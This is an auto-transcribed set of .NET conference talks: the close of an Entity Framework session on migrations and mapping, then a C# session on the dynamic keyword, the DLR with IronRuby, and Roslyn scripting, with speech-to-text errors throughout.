did a much nicer job of looking at the problem I'm trying to solve, which was take these models and stick them in a database somewhere and allow me to retrieve it. They're doing a much better job at looking at that problem and allowing me to solve that problem well without all this other crazy stuff going on with entity data models and so forth. Questions about that? Pretty straightforward. Yes? Yes? Yeah. I think so the question was, can I generate a script based on a database, like compare my database to something that's in production? Oh, update the database that's in production. Yes. When you, there are ways, let me bring up the package manager console again, which kind of disappeared. When you do update database, there is a way to specify basically things like the connection string it should use. So you could say update the database, but don't use this conventional thing of looking at my local DB. Use a different connection string and go to it. There's also the possibility of creating a script based on a source database and a target database. So if you have your development database completely updated and it's ready to go, you could say update database, source migration and point it to your database, target migration, someone else's database, and it'll figure out the delta between the two and either apply those migrations for you or if you include dash script, it will generate a script for you to do that. Yes? Just schema. So the question was, does it include data as well? It's just schema right now. Does it touch the data now? If you, I mean, there's all sorts of situations you can run into where you have to massage the migrations a little bit. Was someone yelling from up there? Yeah? MySQL? Oh, how? Does it support like MySQL? Yeah, I don't know about MySQL. I know one team that's using Entity Framework with an Oracle provider and they seem to be having some success with it. But if you send me an email, I can check on that one. Let's look at another scenario. Let's say that I, let's look at the data real quick. So kind of going back to your question, if we look at, look at departments. Actually, let me look at employees instead. Let's create an employee that has a status and a salary but no name for whatever reason. It kind of gives back to what we saw in the workshop yesterday. So that's existing data in there. It was completely legal at this point to have an employee with no name. And now someone has discovered that as a problem and they do one of two things. They either go in and they change that configuration script to require a name or they change something in the model. Like I can go into an employee and say, oh, this name, actually I really want it to be required. So metadata on the model itself. And that is a change in the model that if I go into the package manager console and do add migration name required, it will create a new migration for me. Where it's going to be. And if I try to run this, I'll run into a little bit of problem because it's trying to say name is not nullable but we have an employee in there who has, whoops, did one of you code, has a null name. You guys saw that. So let me open up the package manager console, say update database that should come back with an error, cannot insert the value null into column name. So it doesn't look at data or know anything about data. That's a condition where you have to go in here manually and do something like execute some custom SQL. So update employees set name equals empty string where name is null. And that should fix that data problem for us. If I update the database now, fingers crossed. And the interesting thing is I think it's trying to seed the database again and running into the problem there. And that might be because of my initial seed method. I didn't give a department an ID and it's probably querying by primary key. That's okay. If I run this right now, we still have that original data in there and I should have a column that is a not nullable name anymore. Yeah, not null. So to apply that migration. So some other things. What happens if I don't like any of this? If I don't like these conventional mapping, so one of the things you could do with the edmx file and the entity designer was map objects to different tables. Give them different names, give columns different names. Or if you wanted to do this sort of approach of using simple objects that you write in a DB context class that use it against a legacy database where the names are kind of weird and you don't want to name this something like TBL departments. Right? I don't want to do that. There's also a fluent, somewhat fluent mapping API that you can use in a method called own model creating. So inside of here I could do something like Dear Model Builder. There's an entity called department and what I want to do is put that into a table called TBL departments. So explicitly giving it a name. And if I want to get a little bit fancier I could say there's a department entity that I want to map and then map basically takes a lambda expression where you get a parameter of type, entity mapping configuration, so I'll call this C for configuration, make it a multi-line lambda expression. So I can say things like C.2 table TBL departments, but also by the way C dot, oh let's see, properties given this table. Do something with the name or do something with the ID, add a whole bunch of code in here to map individual properties and set different attributes on them. And then let me back that up to do just two table to show you that if I add another migration now, change table name, what are they doing over there? That should give me a migration that just renames table, rename TBL departments to TBL department. And I could apply that against the database. So that's EF 5.0, trying to think if there was something else that I wanted to point out to you. Yeah, so, ha, stored procedures, not so good with the code first right now. I mean you can always do once you have a DB instance, you can do DB dot departments dot SQL query and do an exec on a stored procedure and pass in parameters and that would work. But currently there's no nice way to map that into a method that you just call. You'd have to do some manual work to do that. The old EDMX designer used to do that for you automatically. But when you do DB dot departments dot SQL query, it expects you to give it a SQL query that will return department entities. Yes? Oh, yes, complex types work now. The way it identifies a complex type is that if you have something embedded, let's say inside of employee that doesn't have a way to uniquely identify itself. So we'll give employees an address and an address has city, state, and zip. And then we go into the employee and say, let me dock this. You know, maybe there's a home address and a work address or shipping address and something like that. Let me do a build. Oops. Comment that out. Do a build and then come into the package manager console and add a migration. Add employee address. Then this used to the required attribute. I think I know what you mean. Oh, yeah, that's not good. Hopefully that was a problem. All right, let's try that again. Add migration, add employee address. Yeah, so now it's in a little bit of a confused state. Sorry. I made something public. The let's see what this looks like now. All right. Just had to do an update. So that's a complex type now. Let's see if I can split this on the screen. Employee has an address, a home address. That's a complex type because now what it's going to do is embed that in the employee table. So the employee table will have a home address underscore city, underscore state, underscore zip in it. So that's supported. Does that answer the question? Yeah. Yeah. So the observation I think is that the EDMX, you can still do some fancier things with. Yeah, some scenarios. Oh, so the question was why did I do that first script instead of just using the model builder? This initial script? Because this one, so the model builder is just a way, why did I do that instead of just using the model builder? And the model builder to me is just a way to specify metadata about the mapping. So here's how you take my model classes and map them to the database. And it's the migration scripts that are used to actually take that model information that the model builder produces, take that information and now generate a schema to save it with. This is the thing that actually generates the DDL and it works with update database and stuff like that. That to me is the difference. Well I think I'm just about out of time. I know you guys probably want to get to lunch a little bit early. I'm going to hang around for any questions that you have. Hopefully I demonstrated some things that you'll find useful. So thank you for coming.
|
A look at the past, present, and future of the Entity Framework brings to light some interesting contrasts in API design and customer empathy. In this session we'll cover everything from product marketing, to the true spirit of POCOs, and even see some of the new features in the latest version of the Entity Framework.
|
10.5446/50989 (DOI)
|
How was the party yesterday? Woo! Wake up people, wake up, the party's over. Are you ready for some C-Shop Super Magic? Yeah. I need a yeah. I need to wake up too. Yeah! Oh cool, that's good. Okay, okay. Welcome to the C-Shop, or what C-Shop could do that talk. And I hope that by the end of this talk you'll say, oh cool, I'm a C-Shop developer and I like it. So that's the target. My name is Che Friedman. I'm a co-founder in a company named Code Value. Consultancy firm, training as well. I'm a Microsoft MVP and the author of Iron Ruby Unleashed, which is the best book ever created. I have big, big competition from Harry Potter. They took all my readers, but we'll be fine, we'll be fine. If you want to contact me, these are the ways, email, Twitter account, blog, everything. So now you know me. Let me see. How many of you are C-Shop developers? Of course. And VB? Yeah, no one, by the way. Never met someone who actually writes VB, but they say they exist. Okay, I'll just tell you what we're going to see today because there are three parts for this session. The first one is the dynamic keyword and what we can actually do with that because a lot of people just know that it exists but never actually used it. So we'll see what we can actually do with that. Then we'll move forward and see some cool stuff we can do with the DLR in Iron languages, like Iron Ruby. And we'll end up with some Roslyn, which we'll talk about when we get there. Okay, so how many of you have heard about dynamic? Almost all of you, right? And how many of you used it in production? Wow. At least like seven people. That's the most that I've got in this talk, so good for you Norwegians. So this is the thing. Dynamic keyword has been around since.NET 4 has been released. So it's about, I guess, two years, something like that. And not a lot of people have actually used it because it seems like everything is changing, right? Once you go dynamic, like, you're all world just collapsing. Like, ooh, the compiler is not here. What am I going to do? So it's kind of on the, I don't know, extreme side of.NET. And I do hope to make it more mainstream. The thing about dynamic is really that the compiler won't save you here because everything is done during runtime. Once you assign a variable and it's a dynamic variable, all the method resolution and access to fields and properties would be done during runtime. Now, this is just a definition, but you can do so much stuff with that. The cool stuff, magic, some would say. And why not? It's right there. It's right there for you to use it. So let's dive into the demo. Close that and open Visual Studio. And the first demo is about generics. How many of you use generics? Right? I have a problem with generics in C-Shop, especially with just the term generics, because think about it. Generics in C-Shop, yes, thank you. Generics in C-Shop, when you want to create a new instance of the generic type, you need to have a constraint, right? And maybe you need to have a constraint about an interface or a class, and generics and constraints. These are like the opposites, right? So how do you say it's a generic method if it has constraints? So I want to have a real generic method that once that I call something on the object, on that generic object, I can pass any object whatsoever that has this method or field that I'm accessing. I don't want to have a base class. I don't want to have an interface or whatever. I don't want to have constraints. I just want to do a generic method that would work everywhere. And this is why dynamic, I also call it generics on steroids, because you can do generics in.NET in a real generic way. So let's see that. Let's go here and do public t, we'll return a t and add t. Now I'll just show you this tA and tB. Now I'm just putting a comment so you want to see if it can compile or not. So can I do that with generics today? Would it be okay? How many of you think I can remove the comment and compile and everything would be good? Okay, how many of you think it's not going to be good? Yeah, well, you know your stuff in Norwegian, it's good for you. I can't say Norwegians, right? Probably most of you are not from here. Okay, so good for you. So yes, generics doesn't allow me to do that. You see the red line there, it says, oh no, I cannot apply an operator. But well, I want it to be a generic thing. I want it to pass whatever I want here and I want to add these two objects. So how do I do to solve that? Just changes to dynamic and I'm done. Okay, it compiles and it actually works, right? It not just compiles. So I can go, let's do console write line add and int and then I pass it one and two and I'll get an int back. I can do add, I don't know, double and pass 6.78 and 9.21, I don't know. And I'll get a double back and I can do even crazier stuff like hello and whirl, right? Because I can add two strings, so it would work. I can, well, let's do that and one and hello. This would, how many of you think this will work? You're right..NET allows you to do that. Let's run that so you can believe me. So you see, you just add all the stuff. Oh, you can see that. Now you can see that, no? Okay, that's good. So you see one method fits all, which is exactly what generics is about. And I can even go farther because now I can add any two objects that support the plus operator, right? And even if I add a new object, this would fit this as well. So I have here a class called, it's a fun class because it's very fun. It has data, just a property, a string, and it supports a plus operator between two fun classes, so you have double the fun and double the data, okay? So this is just a fun class and then you go and I can just use it on my add method because it's real generic. So I didn't have to implement anything, just needed to have the plus operator there. So I can do a new fun class and hey, hey, I don't know, something like that, a new fun class. And I can run that and it still works. Yeah, you see that. So you see, this is what I call generics because it's really generic. And you can see that I didn't need to use dynamic all over the place. I just have it where I needed, just inside this method because it makes sense, right? So why not? Why not, right? Moving forward to another demo. Now, how many of you know Xpendo object? Okay, how many of you have used it? Cool, right? How many of you use ASP.NET MVC3 or 4? Okay, so you guys, if you have ever used ViewBag, ViewBag is an Xpendo object, okay? So maybe you don't even know that you're using Xpendo object. So this, because of MVC3 and 4, Xpendo object is probably the most popular dynamic object out there. Xpendo object is also called, I think, a state bag, the idea, because you just put stuff in it and you put it in properties and you use it like there were properties, but you never have to actually declare and define these properties, okay? So, and you see, when you see a new Xpendo object, you return, you get back a dynamic object, right? And now I can do something like that, Xpendo.message equals yo, yo. And I've never created this message property, but it looks like a property, it feels like a property, so who cares, right? It's a property for me, and I can just go ahead and print it, Xpendo.message, and it would work, like, let's go here and just change this to 2. And should you see, you get a yo there. Now you can even add, let's delete that, you can even add methods. So, like, Xpendo.print, and let's do action that takes a string, and then do msg and it would go to console.writeLine, and we'll print the message plus dog. Yeah. And now I can use this print method, let's do print, and let's pass yo, right? Because this is what we do. Let's run that and we get yo dog. It's cool, right? So it's kind of a way to construct classes during runtime. If it helps you do stuff, that's great. It's great for MVC because you have this controller and a view that they don't rely on each other, and this dynamic object just makes it not coupled. So it's a cool thing, and it makes sense in these kind of scenarios when you have two different components and they don't know about each other, and you might change the objects that go between them. So this is a good way to do that. Okay, so this is Xpendo object. Let's continue to another demo. By the way, Xpendo object is a dynamic object. It just expands a class named dynamic object, which we will just see how we can take advantage of that. So Microsoft just created this class and took over all the dynamic capabilities of this dynamic object base class. By the way, underneath, it's just a dictionary. A dictionary with a name and this object that you pass it. That's it. Okay, so now if we can actually create classes that return dynamic objects and we can take advantage of the dynamic capabilities of these objects, we can do this ourselves, right? So once that before we do it ourselves, I want to show you a framework that someone else did. It's an open source project. It's called Elastic Object and it's a way to handle XML files. Okay, now how many of you have ever parsed an XML file? How many of you liked the experience? You right there, you should be an XML expert if you like that. You'd have tons of money, tons. Anyway, yeah, so you know XML is not the nicest thing in the world. And this Elastic Object framework, what are they doing back there? This Elastic Object framework just allows us to read and write XML in a more class-like way, which is great for me. You see this is my simple XML. It has a people-root element and then it has a child element person, which has a name, a Twitter handle, and a blog. Okay, that's it, very simple for me. Now I do xElement, which is just a link to XML object. I parse the XML and then I use this extension method called toElastic and I get back a dynamic object. And this dynamic object, these people here represent this people element here. It's just one-to-one. And then I can go over all the child nodes of people named person and get a dynamic object over each iteration. So this is how I get the child elements of the people element. And now in each iteration I have this person class and it's a dynamic object. And then what's cool about it is that I can use the attributes just like there were real properties. I didn't need to create this class like a person class and then serialize this stuff. It just works as it is and it just because it uses the dynamic keyword. So I use this element, the attributes as properties. It looks like class that I created. It feels like properties. So great, win-win, right? Now, reading XML is nice, but writing XML is even nicer, right? Of course. So here again we can do something more class like when we write XML. This is writing XML. So we create a new elastic object and give it the name of the root element. And this returns me a dynamic object. And now I can have like Ben.name looks like a property, but this actually would be an attribute in the output XML, right? And then I want to add child elements named songs. And in these songs I want to have a song and a song and a song, okay? So this is the way you do this here in this framework. You just go Ben.songs.song. This is creating a new node named song. And then you give it the attributes and use them like properties, name and length. And then I have another song and name and length. And it looks like a class. I never created this class because it's just dynamic. Now, the guy who created this framework, he's called Anup, a super smart guy. But I don't know why he chose this way to output the XML from the dynamic object. It's totally legit. It's a legit syntax, C sharp syntax. He just overloaded this greater than symbol. And this is how you do it. It's just like calling a method, just a synthetic sugar. So this, as you can see, returns you an x element, which is a link to XML element object. And then you can go ahead and do whatever you want with that. So here I just printed. And let's see how it looks like. So you see these are the two lines that I read. So just outputting them. And this is what happens when you create the XML using the Alexi object framework, which is just Ben and the name and songs. And then we have a song and a song and an attribute. And it just goes on and on. And now if tomorrow someone comes to me and says, this song has to have something else, like, I don't know, song to rating. And I want it just here. I can just go ahead and do something like that and run it again. And now it has name, length, and rating. Very simple. We don't need to go and change the class and then serialize, this is all this stuff, very simple, straightforward. There are more frameworks that have been created using dynamic, a lot of ORMs, mini ORMs, like massive and simple data, if you want to just connect to a database and you don't want to use antifirm and hibernate, which are huge frameworks, check it out. It's called one of them called massive. Rob Connery did that, actually. And one of them called simple data. They're both very similar, so just go and look for them. Okay, so this is it. Now, another thing. Now we've seen how we use frameworks that take advantage of the dynamic keyword. Now we want to write them ourselves, right? So I've created this crazy, crazy super magic object. And you see it's called log method calls, and it's a dynamic variable. And then I can do my object.yoh, of course. And I can even go ahead and do, I don't know, I can type here, whatever I want, and you can stop me. Yeah. I can go all day. Let's save that and see what happens. So you see, crazy, crazy magic goes on. It just says, trying to invoke yo when trying to invoke, I can type, er, er, er, er, er, er. And it's really cool, and it gives you the idea that you can actually intercept here. Once a method is called, you can do whatever you want with that, right? So let's see how we do that. This is the class. This is it, right? The name is log method calls, and it extends a dynamic object class. Now, the dynamic object class, if we try to overwrite stuff, you see that it has all these try things, try binary operation, try a convert, try, try, try, try, try, try. This actually represents all the things that you can do on a class in.NET, okay? So anything that you can do on a class, you can intercept with your code and do something else, okay? So what I did, try invoke member, is just when you invoke a method, I just wrote the name of the method, and if you look just on the arguments, you have a binder which just says the name of the method and some more metadata. You get all the arguments passed to this method, and you can send back a result, okay? So what I did, I just put null in the result because I don't want to return anything. Then I returned true because if I had returned false, I would have gotten an exception, like method was not found, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah. Okay? So this is, you see, this is very simple, right? Now, it's not like only for people who talk to you and you don't know what they're saying, but they're saying smart stuff, right? So many people like that here. So as a regular person, I can do this as well, so it's good. So this is one thing. Now, I want to show you just a cool thing that I did with that because log method calls object is a great thing, but I'm not sure you really want to use this. So I've created something called a super finder, right? Because it finds things in a super way. How many of you have seen Active Record? Right. Okay, Active Record is an ORM in the Ruby on Rails world. And they've got like cool methods, they call them magic methods, that you can go ahead and do, like, if you have a user object, for example, go ahead and do user dot find by and then the column name, okay, so if you have like an address, for example, an under its column, you can go find by address and do something like this is the value. And this would go and query the database according to the address column and the SDFD value, right? And if you had another column, which is, I don't know, age, you could just write find by age and then put something like that, okay? So, kind of cool, kind of very explicit and you can read it, read through the code, you don't need to do these weird queries. So I wanted this in.NET, right? So what I did, let's remove the return here, let's remove all of that because you've seen that already. And what I did, I created a data table, now don't kill me, I know data tables are evil and data sets are a thing that need to be dead and done, but it just works good for the demo, so don't kill me, please. So I have a data table, you can see how it looks like, it's just this very simple data table, it has one table and two columns, ID and a name, and each column has these records like one in Norway, two in Sweden, okay? So this is the data table and then I can create a new super finder and pass this data table and I get a dynamic object in return. Then I can go on and do finder.findByName, this is the column name and this is the value, right? And if I wanted to query by ID, I could go ahead and do find by ID and do free, okay? And this would work as well. So kind of like active record, I could go ahead and like if I had another column, I could go, I don't know, find by a continent, okay? And this would work as well. So let's return that, find by ID would be cool. So you can see that it actually works. Yeah, demo five is good. So let's run that. So you see it gives you free Denmark. So it works. Just tell you that. Let's see how I did that because again, it was very easy. This is my super finder class. It extends the dynamic object, right? And I have a constructor, it receives the data table and then I again, over it in the try invoke member method. And then only if the name of the method that is called starts with find by because this is what I want to allow, I'm going ahead and do something. Otherwise, I just return the base try invoke member, which here would throw an exception, but you can do other stuff as well. So once I have this, if here, what I'm inside, I just remove the find by from the method name, and then I have the column name, right? And so I have the column name, I have the value from the first argument. This is just for the query. So I have this number sense there. And then I do a select on this data table, just a query, right? And return the result. This is the result that is being returned. And that's it. Super easy. Like, I don't know, six, seven lines of code. And I have this super method that I can just put the name of the column and find it by that. So you see that you can give C sharp super powers using that. Like, you can't do that otherwise, right? It would be a crazy thing to do that in a different way. It's so easy. And you see that the result also returns a data row. So again, once you go dynamic, you don't need to change your entire code to be dynamic, right? So again, this is a really cool use case. And you would see actually something like that in a massive and simple data, which have these kind of methods as well. Okay? Cool. Now, let's continue. Well, that was dynamic. If I have more time after that, I'll show you some more stuff about it. Now, moving on to the DLR. How many of you have used one of the DLR languages like Iron Ruby or Iron Python? Raise your hand, all of you, just to make me feel better. Thank you. Thank you. Okay. So the DLR is actually a part of the.NET framework,.NET 4. And Iron Ruby and Iron Python were written on top of that. And C Sharp and VB actually take advantage of that, of the DLR. And the idea of the DLR is just to provide services to dynamic language implementers, just like the CLR provides services to static languages, right? It's the same idea. And the DLR is just written on top of the CLR, right? So they have CLR and DLR, and next they will have ELR and then FLR. Who knows? Yes. So let's just see how it's written, right? So the first thing it has is expression trees. And the idea here, expression trees just represent your data, not your data, your syntax in a tree, right? The syntax gets translated to a bunch of objects which represent your syntax, okay? Now, so if you're a dynamic language implementer, you would want to take the syntax, write an interpreter that takes the syntax, translates that to an expression tree, okay? This is what you do. And then you have this expression tree. You give it to the DLR. And now, once the code starts executing, it gets to a point where there is a call to something, method, field, whatever, which is not inside the context, right? And it needs to go out of context to find and call whatever it needs to be, it asks to be called. So this is why they have this thing called dynamic dispatch, which is go out of context and tries to execute what you want. And this uses binders, okay? So once, like, for example, Ion Ruby tries to execute something from the.NET framework, it would go and use this object binder, right? And maybe Python, Ion Python code tries to execute an Ion Ruby code, so it would go and use a binder and Ruby binder from Python. Okay, so you can see that all of these different worlds, by the way, you can see objectbinder for.NET, JavaScript, Python, Ruby,.com, different worlds can now interact thanks to this dynamic dispatch feature, okay? So it's kind of cool. Last but not least here is what's called call site caching, which is just a caching mechanism. So once you run code, you interpret the code, and then you execute it, next time you execute it, you will not have to interpret it again and again and again. So the idea is that once you run your dynamic application, it would run faster as time goes by, okay? Because all the things would be cached, okay? So these are the three main stuff of the dynamic language runtime, the DLR. And on top of the DLR, as I said, Ruby and Ion Ruby and Ion Python, they started as a Microsoft thing, now they're open source. If you want to contribute, go ahead, we need you. If you want to buy a book about Ion Ruby, it's down there. Now, C-Shop and VB.net take advantage of the DLR when you use the dynamic keyword, right? All the binders and dynamic dispatch stuff, they use it once you go ahead and use the dynamic object in.net. Now, other languages were written on top of that as well. For example, one created Ion.js, which is a JavaScript implementation on top of that. Someone tried to do Iron scheme for scheme. Someone did Nuwa, which is an implementation of the Lual language. And also this, it runs. This is LOL code. It runs, really. So high code start. I has a fish, it's yummy, just fish equals yummy. Visible high world is just console right line. I'm in your loop. Loop start. Kthanks is loop end. Kthanks buys code end. So this actually runs. Someone from the DLR team created some kind of a POC with that. If you go and look for LOL code online, they have a specification for the language. So it's a real language. Haven't met anyone using it in production yet. But you never know. If you do, send me an email so I can, once I do these talks, I just can show your name or something. So I'm going to show you not this, but what you can actually do with the dynamic, with the DLR in your applications. And I know you're not going to transfer and now write all your code in Iron Ruby or Iron Python. But I think there are several different cases where you can take these languages and incorporate them into your application. And they will make perfect sense there. So let's close all of these. And go to this thing here. Let's run it. This is my great, great awesome rule engine. A thousand of man hours spent on the design of this thing. Now, I can go and click here and I have these validation rules. And I can go, let's see, go textual and let's say the max length can be three. And save it. So once I do AA, it would be happy. And when I do AA, BB, BB, BB, BB, it would be sad. You see how many design hours spent when you have this white background. Yeah, well, I'm not good at designing things. Anyway, now, what's wrong with that? It's cool, but once it goes out and it gets to the customer, right? And don't get me wrong, I love customers, right? We all love customers. But customers tend to have weird requirements from time to time. Now, what do you do when a customer comes and say to you, well, your rule engine rocks. But I need, now, I want this, the value to start with the letter C. Otherwise, I want it to fail. Well, you say, okay, cool. And you go and add this feature here. So now you have like, I don't know, checkbox says and you can choose this first letter as C rule, right? And now comes another customer. And you love them too, right? But they have another weird requirement. And then you have another customer and another, and it goes on and on and on. So I say, give power to the people. Let them write the rules. And you just count the money, right? So you can do that today, like with a math or some extensibility frameworks. But I think for something like that, which is just simple rule engine, you need a simpler solution, right? So what I'm going to do, I'm going to close this. I'm going to open this, change this to true. And I'm kind of done. Crazy, crazy thing. And now I have this thing here. Okay, custom rules. And this is actually an iron Ruby text box. Okay, I can write iron Ruby code, which interacts with my.NET code. And this is where I write my custom rules. So if this customer comes and say I want this first letter as C, he can just go here and say, if value, the first letter equals C, then we turn true. And else return false. And then this you don't need. And that's it. We click save. Let's put textual here. Click save. And now we see something. The validate is happy. But if we start with something else, it's sad. Okay. So now we gave power to our customers to write these custom rules. It's very easy because it's very simple. Not just, they don't need to create a DLL and assembly, I don't know, implement some interface. They just need to write a simple rule right there. And that's it. Okay. This is iron Ruby. You can do this with Python as well. Now, and you probably think, well, it's probably would have been crazy to write that like 1000 million gazillion hours. Right. No, actually no. I just needed to download iron Ruby, use their DLLs, reference them and then add three lines of code. That's it. Nothing more. Let's do that. See, let's even do that. Now it really seems like three lines of code. This is it. Right. The first line just creates the Ruby engine, right, which is just where all the language interpreter lies. Then I need to expose something to the script, right. I want to expose the value of the text box. So I just expose it to the script with a value, a variable named value. And then I execute the code from this text box and get a Boolean in return. That's it. Done. Finito. Right. So this is very simple. This is a really big use case in my opinion for all the DLL languages because it just makes so much sense to use it. Right. So, yeah, this is just one example. I have more, but I don't have time for that. But this is really a big, big example of how you can take advantage of the DLR in your current applications for these simple solutions. Okay. So, yeah, you can see this again. Moving forward to the last part, which is Roslyn. How many of you came to my session about Roslyn? Oh, thank you, sir. It was fun. It was fun. You should look at the video. Anyway, how many of you have heard about Roslyn? Okay. Cool. So Roslyn is the new C sharp and VB compiler. Okay. It's not yet the compiler. It's still in CTP. But it will be the next compiler. It's written in C sharp and VB.net. Right. They write the C sharp compiler in C sharp and the VB.net compiler in VB. It's the largest VB.net project inside Microsoft at the moment, by the way. They don't use it either. Anyway, Roslyn has four parts. It's not just the compiler, right? What I like about Roslyn is that it's just not just the compiler. It's the idea of compilation and took it and expanded it all over the related things to compiler, to compilation. For example, think about it, the compiler compiles code, right? And code is written inside an IDE. And in.NET, the IDE is Visual Studio. So they took the experience of writing Visual Studio add-ins and enhanced it. And they took the idea of using the solution files and make it better. So everything that is related to code is inside Roslyn and they try to make it better, the better experience. So the first part here is the compiler. You can compile code. You can get the syntax, the syntax tree. You can intercept your code inside before you have the compile process. So you can get the syntax tree, change the syntax tree, and then execute the compilation process. So it's kind of cool. There are so many things that you can do with that. I'm not going to show you compilers today, but look at the video, right? Scripting is cool, and I'm going to show you scripting, because it kind of allows you to use C-Sharp as a scripting language, which opens again a bunch of new opportunities, which is kind of cool. Workspace, how many of you needed to open a solution file in a text editor and change it by hand? Right, okay. How many of you liked it? I know. So what they did, they took the entire thing, created an API for that, and now you can go through the solution file, the projects, the files inside, add, remove, update files. You can do this all via an API. An API that makes sense, right? Not like you need to have a fair degree or something like that. So it's really nice, and probably you wouldn't need to go and change stuff manually in solution files anymore in the future. So thank you, the Rosling team, for that. Now, service is the last part, and it's just a way to write Visual Studio add-ins, okay? And in context of syntax, right? So you can write refactoring tools very easy, okay? So this is the idea, and again, writing Visual Studio add-ins, if you have tried that, it's not a nice thing, okay? And nice is, you know, it's, well, you don't want to go there. Anyway, so service is trying to make it better, and they actually use Meff, and it looks nice, and you can watch the code and understand it, which is good. Okay, so these are the parts of Rosling, and let me show you the scripting part. How much time did I have? Okay, cool. So first one. I can, let's go here. And I'm going to add a new item, okay? Maybe I shouldn't have done this here, but let's see. Yeah, well, I'll go here and add a new item. And now, once you install the Rosling CTP, you have a Visual C-Shop script, okay? Ooh, script C-Shop. That didn't work well together before. Let's edit, okay? And what you can see, the difference now, you don't have classes, you don't have methods. You just write your code right away, okay? So all the ceremony of C-Shop goes away. You can write what you need, just like a script, so you can do a console, that's right line. Of course, because this is what you always need, and that's a, of course, Yo-Dog, yeah. No, I don't need a semicolon. It doesn't make sense. Yes. You can actually write classes and methods here, but you can also do that. And now you save it, okay? Let's copy the full path of this thing, and let's open CMD. And you have something that is called R-CSI. Let's see if this joke works. Miami and R-CSI New York. I'm going down. So you have R-CSI, and R-CSI is just a compiler, and then it executes this script, C-Shop script, right? So let's just do that. This is my C-Shop script. It ends with CSX, okay? So I start with R-CSI, and then with SCS-CX, and I click Enter, and you see Yo-Dog. Okay, so you now have scripts in C-Shop, okay? Which is kind of cool. You can just have it, write you, what's something you need, and just execute it wherever you want. So this is a cool thing. Another thing that you can do with the services, not the services, the script in API is writing a REPL. How many of you know what REPL is? Okay, cool. REPL is a read-the-value-it-print-loop application, which means that it is just an application that gets lines of code. You write the code, you click Enter, and the code gets executed, okay? And then you write another line of code, click Enter, and it gets executed again, right? So just like dynamic language developers have had for many years, right? So 2012, and we now have these two. Let's run my Roslin fun code. And now we have a C-Shop REPL console, okay? And now I can go ahead and do a public class, yo, public void print, system.console.writeline, um... Yeah. And click Enter, and now I have this class. And now I can do var y equals new yo, y.print, and you see it says yo. And it's kind of cool. You can actually move away from Calculator and use it instead, okay? So it does that, and it's crazy, crazy calculations. So you see you can just interact with C-Shop in just this cool REPL window, and you can load your assemblies, for example, and write, just try them out. Like load an assembly, try some methods or something like that, which would be a good example for that. Now, this thing here has the craziest, best feature of all times, right? Bye-bye. And it quits. Now, how did I do that? Let's go here. Very simple, actually. I just have this scripting host class. I will show you that in just a minute. And this just takes care of all the input and output for the user. So until you get a bye-bye, just execute the code line and output the result. Okay, this is the entire idea here. Now, let's see the scripting host. This uses the Roslin scripting APIs, and you see I have a script engine and a session, okay? The session is here just so you can save the lines of code that were interpreted already. So once I wrote the class definition, the next line would say I can actually use this line, okay? So this is why I need the session here. So I have, like, an iterative compilation. And I have the session. I have this script engine. And if you remember the Iron Ruby example, kind of the same. This is the engine for C sharp now. These are the assemblies that I load, okay? Just like add reference, just from code. And this is the using statements that I want to have, okay? So I just use that for the script engine. So now I have the engine and the session, and all I need to do is just call execute. We just call engine.execute and passes the code line and the session. That's it, okay? This is very simple. Very, very simple, very cool for this HitchRapel example, which is not that, but anyway, you know what I mean. Now, another really cool thing in Roslin is that once you install the CDP, you can go to view... C sharp interactive window. And you got the interactive window, the Rappel thing inside Visual Studio. So you can go ahead and do console.writeLine. And I don't know if you noticed, but I have IntelliSense here, which is kind of cool. And I can go ahead and do this stuff and I get immediate results, okay? So again, you can load your assemblies here, try it out, and just see what happens, okay? And also, if you're not sure about the method, how it reacts to different parameters, you can put it here, just write it, see what happens, and go on with your life. So it's cool. And of course, of course, you don't need to calculate it anymore. You have it here inside Visual Studio. You don't need to ever leave Visual Studio again. So, yeah, it's very cool. However, this interactive console does not support buy-buy. It just doesn't know what to do with that, like error and stuff. So this is Roslin. This is just the compilation, the scripting APIs. Of course, Roslin has much more than that, but you see how cool it is and where it's going. Okay, so I think we'll just have questions now, because we have not a long time left, and then I'll summarize them. So, questions. Yes. Will Roslin be part of the Visual Studio 2012? Okay. The question was, will Roslin be part of Visual Studio 2012? And I don't think so, because they've just released another CDP, and they're not in an RC or RP or whatever they call it now. So I'm not sure. I'm pretty sure that on Visual Studio Vnext, this would be the compiler. The CSC.exe would go away. Okay. More questions. Yes. Regarding performance with Dynamics, when you first have gotten a map of things to a call-side cache, is it done almost or as fast as calling a traffic that's a compiled map of a... The question was about the performance of the dynamic keyword, which is a great one, because I can show you that. So, thanks. Let's do that. Let's go back to this, and for example, the first demo. Okay. So let's just remove that. I told you that there is this call-side caching thing, so once you call the method once again and again, you get better results. So let's do that. And I have this thing here. Yeah, it can't be prepared. Okay. So add. So I just use stopwatch. Okay, to show you how much time did it take. Now let's run it one time. Let's go to program. Demo one. And starting project. And run. Okay, so this took five milliseconds. Once. Okay. Cool. This took five milliseconds. Now let's do this for a thousand times. Let's run that. Took five milliseconds. Okay. 100,000. Okay. Did I answer your question? Okay, I can go on and on. Yeah. I can. Okay. I saw. So you see, the performance, you do have like a small amount of time at the beginning to do the interpretation. But once you go through this line, you're kind of good. Okay. More questions. Yes. The question was whether the interactive window for us in, once you are in debug mode, would it load with the state and the context of your application? It makes a lot of sense, but no. Right now, the CDP actually doesn't, it has some limitations, like it doesn't support dynamic and some other extreme stuff. So it might not work for some stuff. But once it out, it would support everything. And it sounds like a good idea. So I'm sure someone would do that. But right now, it's not. One more question. Or not. That's it? You're all shocked. What just happened? Okay. Okay. So let me summarize. So, cool. So we started with the dynamic keyword. I showed you some different things that you can do with that. I really believe that dynamic keyword has a place in the.NET world. Like, I know a lot of people don't use it, but you see that there are uses just, you can just go ahead and use it. And it makes your life easier. So why not? Right? If you can, why not? You can do something in one minute instead of ten. I don't see the problem. The DLR, again, has a space in the.NET world where it fits. Right? Where it fits the most to you. If what I showed you makes sense, go ahead and use it. If other things that you can think of make sense, go ahead and use it. It's right there for you. It's not going away. I'm not sure what I said before. The DLR is a part of the.NET framework. And I don't know if you know, the.NET framework is like Elcatra's prison for stuff. When it's go in, it never goes out. So the DLR is there. It will be there forever. So you can take advantage of that. And that's what not least is Roslin, which I believe is going to change a lot of the stuff in the.NET world. Because you will see metaprogramming in.NET. New keywords come to life. Stuff like that, which will make your experience with C-Shop much more interesting and on the same thing, on the same side, much more easier, I think. So yeah, Roslin is something to expect. And I definitely wait to see when it gets out and what happens when the community takes over and starts to use it and do great stuff with that. Resources, rruby.com, rnpyson.net, if you want to download this 